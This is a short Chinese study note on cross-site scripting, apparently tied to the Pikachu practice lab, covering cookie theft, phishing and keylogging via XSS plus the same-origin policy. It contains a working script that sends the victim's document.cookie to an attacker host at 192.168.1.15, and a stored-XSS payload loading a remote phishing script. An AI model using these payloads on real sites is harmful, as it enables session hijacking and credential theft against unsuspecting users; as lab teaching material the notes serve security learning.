漏洞.doc

cookie获取xss后台使用

   引起用户点击特制url（好比告诉用户这是优惠网）,用户点击后进入攻击者指定的本身的页面，返回用户的cookie到攻击者的后台

<script>

document .location='http://192.168.1.15/pkxss/xcookie/cookie.php?cookie='+ document.cookie;

</script>

 构造的url指定连接是后台存储cookiede页面，页面能够重定向到其余页面，不引发用户的怀疑

 

 

 

 

 

 

 

 

 

xss钓鱼

代码

 

在存在存储型xss漏洞的留言板上输入：<script src="http://10.67.1.251/pikachu/pkxss/xfish.php" ></script>

xss获取键盘记录

 

同源策略：两个不一样域名之间（跨域）不能使用js进行相互操做。如需进行跨域操做，要进行特殊配置，好比经过：header(“Access-Control-Allow-Origin:x.com)  //容许被x.com跨域请求

下面这些标签不受同源策略限制：

<script src=”..”>//js，加载到本地

<img src=”..”>

<link href=”..”>//css

<iframe src=”..”>//任意资源